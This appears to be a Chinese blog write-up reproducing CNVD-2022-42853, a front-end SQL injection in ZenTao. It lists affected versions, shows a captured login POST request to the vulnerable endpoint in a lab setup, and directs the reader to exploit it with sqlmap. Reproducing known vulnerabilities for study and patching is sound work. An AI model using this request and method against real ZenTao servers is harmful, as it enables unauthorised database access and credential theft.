漏洞复现 – 禅道前台注入

漏洞编号

CNVD-2022-42853

禅道企业版 6.5 
禅道旗舰版 3.0 
禅道开源版 16.5 
禅道开源版 16.5.beta1 

复现过程

搭建禅道环境,点击 start 运行

漏洞复现 - 禅道前台注入
漏洞复现 - 禅道前台注入

访问地址,登录进行抓包

漏洞复现 - 禅道前台注入
POST /zentao/user-login.html HTTP/1.1
Host: 192.168.121.133:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.121.133:82/zentao/user-login-L3plbnRhby8=.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: http://192.168.121.133:82
DNT: 1
Authorization: Basic emVudGFvOmRCRWRQVUl4VGlu
Connection: close
Cookie: zentaosid=b9b1928181cf6feba9c9ec5781c64b54; lang=zh-cn; device=desktop; theme=default; windowWidth=1664; windowHeight=810; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=f88b39d5; PHPSESSID=qii4d2oujq7jc6rhecjlq6fga1; KEY_RANDOMDATA=19059

account=admin&password=d946e9f1a52f641d4ce78ad58da857af&passwordStrength=0&referer=%2Fzentao%2F&verifyRand=57784117&keepLogin=0&captcha=

把数据包放到 sqlmap 中进行利用

漏洞复现 - 禅道前台注入
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容